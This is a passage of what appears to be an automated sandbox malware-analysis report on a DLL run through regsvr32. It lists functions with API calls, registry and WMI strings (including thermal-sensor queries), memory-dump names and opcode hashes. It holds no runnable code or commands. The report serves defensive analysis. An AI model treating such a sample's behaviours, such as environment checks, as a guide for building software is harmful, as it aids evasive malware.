                                                                    • Opcode ID: 0c16cb222a3a48fd4da08c14caa007e5563a0fc06241afcabd18d8df6be5f5aa
                                                                    • Instruction ID: c740ff6684da62050c09a975f4befe7c6a31ca1af4f4eef6383966648e79751a
                                                                    • Opcode Fuzzy Hash: 0c16cb222a3a48fd4da08c14caa007e5563a0fc06241afcabd18d8df6be5f5aa
                                                                    • Instruction Fuzzy Hash: 70219215B0F54742FF24AA5E9460AB96290AF85BC4F884935EE7DC7FE9CE2CE4428341
                                                                    Function 00007FFDFB22C22E Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: BufferFree$Return$memcmp
                                                                    • String ID:
                                                                    • API String ID: 3486352366-0
                                                                    • Opcode ID: 90e61ff390e64d9a7f70382ec595c1ca15daf3d469f168c875f0c8e9d41fb5f6
                                                                    • Instruction ID: 2042bab35f1bfc68255f706b338404efed52da62ed97ed1f0ac73b6b0d1e9a63
                                                                    • Opcode Fuzzy Hash: 90e61ff390e64d9a7f70382ec595c1ca15daf3d469f168c875f0c8e9d41fb5f6
                                                                    • Instruction Fuzzy Hash: A6115415B4F58741FF24AA5A94609B95250AF85BC4F480535DE7DC7FE9CE2CE4428341
                                                                    Function 00007FFDFB222160 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 00007FFDFB22224B
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                    • API String ID: 3677997916-1421764643
                                                                    • Opcode ID: 0fda1c673ceca58a43ee99b34e4de1fe7cf74656078fc208c6b6d16f2b320241
                                                                    • Instruction ID: 13afd691cc1d10734d033a8a9809d06402aba43130bb86101a399cf63c2ca059
                                                                    • Opcode Fuzzy Hash: 0fda1c673ceca58a43ee99b34e4de1fe7cf74656078fc208c6b6d16f2b320241
                                                                    • Instruction Fuzzy Hash: DE91827270AB8285EB60AB15E4507AAB7A4FB80780F905135EEDD87BADDF7DD144CB00
                                                                    Function 00007FFDFB2C09D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID: CCG $TSUR$TSUR
                                                                    • API String ID: 3997070919-4029986600
                                                                    • Opcode ID: be21714f870a850417e1f2207fbd5bcc78359ae89a568a8ef9cec64fd3aff9e3
                                                                    • Instruction ID: 1c28ff365d7dd7312d5936c93d9bddf86ee10a9c27c4170ca7b790d2f0842abe
                                                                    • Opcode Fuzzy Hash: be21714f870a850417e1f2207fbd5bcc78359ae89a568a8ef9cec64fd3aff9e3
                                                                    • Instruction Fuzzy Hash: B831C322F29B8682E714DB5598106F92760FFD9B84F45D235EE9D437A4EF3891E5C300
                                                                    Function 00007FFDFB29E770 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 314COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Components$assertion failed: is_code_point_boundary(self, new_len)$exe\\.\NULexit code:
                                                                    • API String ID: 0-953524122
                                                                    • Opcode ID: 7d4296cb1a4e65ccedb1eee6053b9f0395c84f6846f89eec99184c3211c2cba0
                                                                    • Instruction ID: ee76671458da2ba655f13a69df5f99c602c1b97df47be3b7845ab015edef8f29
                                                                    • Opcode Fuzzy Hash: 7d4296cb1a4e65ccedb1eee6053b9f0395c84f6846f89eec99184c3211c2cba0
                                                                    • Instruction Fuzzy Hash: C0B1D571B0BA5385FF55AB6194A4AB92691BF04BC8F048835CD2D977FDEE3CE44A9300
                                                                    Function 00007FFDFB215200 Relevance: 6.2, APIs: 4, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AccountLookup$ConvertFreeLocalString
                                                                    • String ID:
                                                                    • API String ID: 2884463747-0
                                                                    • Opcode ID: 160e9365936cf7a0d4c89d484a12c7d80f063699b75887e0aac085e33207f3b9
                                                                    • Instruction ID: c3dd5a5d9de6ce03d501793b72ac9d325f1d55f0f9df79f5fa2344bccf7dcc3e
                                                                    • Opcode Fuzzy Hash: 160e9365936cf7a0d4c89d484a12c7d80f063699b75887e0aac085e33207f3b9
                                                                    • Instruction Fuzzy Hash: CC816A3270AB4292EB209B51E460B6AA7A0FB85784F540035EEDD87BEDDF7DE441CB40
                                                                    Function 00007FFDFB207360 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs, xrefs: 00007FFDFB2073D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs
                                                                    • API String ID: 3510742995-1099963043
                                                                    • Opcode ID: d820e826a8be504fb17af10a82aeed62ca364efd42daaf38244ac31e4559b07e
                                                                    • Instruction ID: c831cf17ae09383005166c8c1b3b0dde67772f0b81489b20056a7a24d9ae129b
                                                                    • Opcode Fuzzy Hash: d820e826a8be504fb17af10a82aeed62ca364efd42daaf38244ac31e4559b07e
                                                                    • Instruction Fuzzy Hash: 2061B436B0AB8685EB109B15E4547A96760FB95BC4F588131DEAC877F9DF3CE145C300
                                                                    Function 00007FFDFB201010 Relevance: 6.1, APIs: 4, Instructions: 107sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep_amsg_exit
                                                                    • String ID:
                                                                    • API String ID: 1015461914-0
                                                                    • Opcode ID: b641bfed71cacac4c60620ca17e9b895a375f51facf368f8d736af88659ae333
                                                                    • Instruction ID: 724aeacef76b5512b3434c40bbb978cabd227a64b55bc9a7ee821d9b4bc5202f
                                                                    • Opcode Fuzzy Hash: b641bfed71cacac4c60620ca17e9b895a375f51facf368f8d736af88659ae333
                                                                    • Instruction Fuzzy Hash: 05415B30B4A64786F715AF15E861B7966E1AF48BC5F484031EDAC877FCDE2DA8419340
                                                                    Function 00007FFDFB28C260 Relevance: 6.1, APIs: 4, Instructions: 83sleepsynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$ObjectSingleSleepWait
                                                                    • String ID:
                                                                    • API String ID: 2593906732-0
                                                                    • Opcode ID: 92093e7900d96d8c4880aaba8b248f3d7dcf9c291f38ffbdd6ee0855f602c98c
                                                                    • Instruction ID: 9edb9b2e317254a739193c82e6df0b3fd873f513ac5bdb92628f687c517e7d5d
                                                                    • Opcode Fuzzy Hash: 92093e7900d96d8c4880aaba8b248f3d7dcf9c291f38ffbdd6ee0855f602c98c
                                                                    • Instruction Fuzzy Hash: 9321D152F0EA0306FF68A6292925B7945861F853E4E089232AD7E86BEDCF3CE4424201
                                                                    Function 00007FFDFB214C10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID: CriticalTripPoint$CurrentTemperature
                                                                    • API String ID: 1473721057-3920528518
                                                                    • Opcode ID: bc35f46b402e4f932862f10ef7ba6f6f5aa6a836c14b0d86b4fd00ff7f7dea13
                                                                    • Instruction ID: 5aaab317d77dc5d698e5fe88417e4b217dd8daec4074f84726172b08c5de9063
                                                                    • Opcode Fuzzy Hash: bc35f46b402e4f932862f10ef7ba6f6f5aa6a836c14b0d86b4fd00ff7f7dea13
                                                                    • Instruction Fuzzy Hash: 3D91AA32B1A68292FB61DB24E4647AAB390FB84344F505135E6AD82AFDDF7CD185CF00
                                                                    Function 00007FFDFB2144A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: String$AllocFree
                                                                    • String ID: root\WMI
                                                                    • API String ID: 344208780-2712063579
                                                                    • Opcode ID: 27f1dc1efe08ff44dfcc107919422ea478e86da9b32577a8d41c7a5024e8475e
                                                                    • Instruction ID: 8501448f49bd0d54e7a96cae47126a5dbe5d1470a9ea95e91685acdf97664cb5
                                                                    • Opcode Fuzzy Hash: 27f1dc1efe08ff44dfcc107919422ea478e86da9b32577a8d41c7a5024e8475e
                                                                    • Instruction Fuzzy Hash: 44712D32709BC291E760DB11F4647AAA7A0FB85348F504135DAED86AEADF7DD484CB40
                                                                    Function 00007FFDFB21446A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocString
                                                                    • String ID: root\WMI
                                                                    • API String ID: 2525500382-2712063579
                                                                    • Opcode ID: d44e3d030758f08b54c5dcf21609a7751f8543723886b08e5c0bf119d99804a8
                                                                    • Instruction ID: 808ddaf55e78b36c691e102acf925791214741909637381eee9ae295d783fe0e
                                                                    • Opcode Fuzzy Hash: d44e3d030758f08b54c5dcf21609a7751f8543723886b08e5c0bf119d99804a8
                                                                    • Instruction Fuzzy Hash: 2461502270D7C290E760DB11F424BEAA7A0FB86388F444134DADD86AEADF7DD485CB00
                                                                    Function 00007FFDFB21445D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: String$AllocCaptureContextExceptionFreeRaiseUninitializeUnwindabort
                                                                    • String ID: root\WMI
                                                                    • API String ID: 3978314060-2712063579
                                                                    • Opcode ID: ca3ca4bf73fa3634b835e6928584fb45e0bef150d439b4d3c98263f7e25362f1
                                                                    • Instruction ID: 4f437f568616e9fb1670d902d5b81fce9b71b7159c52f26d2be12ec9a6256e6a
                                                                    • Opcode Fuzzy Hash: ca3ca4bf73fa3634b835e6928584fb45e0bef150d439b4d3c98263f7e25362f1
                                                                    • Instruction Fuzzy Hash: 1F614F3270D6C290E760DB11F424BAAA7A0FB86388F544134DADD86AEADF7DD485CB00
                                                                    Function 00007FFDFB214465 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: String$AllocCaptureContextExceptionFreeRaiseUninitializeUnwindabort
                                                                    • String ID: root\WMI
                                                                    • API String ID: 3978314060-2712063579
                                                                    • Opcode ID: 9e17f84cfc077cffa44802880004ee1cd702a2f114e76d381d71444006714322
                                                                    • Instruction ID: 9930319c5ec297929489b9652af14697b8fb52f81852bd905b3021b003625a12
                                                                    • Opcode Fuzzy Hash: 9e17f84cfc077cffa44802880004ee1cd702a2f114e76d381d71444006714322
                                                                    • Instruction Fuzzy Hash: 50614F2270D6C290E760DB11F424BEAA7A0FB86388F544134DADD86AEADF7DD485CB00
                                                                    Function 00007FFDFB2267E0 Relevance: 5.1, APIs: 4, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID:
                                                                    • API String ID: 3510742995-0
                                                                    • Opcode ID: 4e6aca2f2a00dabdab28ed4bb2818ea65fda1ce4b6942103f5313d0f1bdd30bb
                                                                    • Instruction ID: d4d5111daa4695f60a902b18b24078f71c88da57ebbbc42f878e8828759b6fa5
                                                                    • Opcode Fuzzy Hash: 4e6aca2f2a00dabdab28ed4bb2818ea65fda1ce4b6942103f5313d0f1bdd30bb
                                                                    • Instruction Fuzzy Hash: 8D41CD33B2665241F7129B26DC01BAA5A60BF92790F898736EEB8567D5EF3CD148C300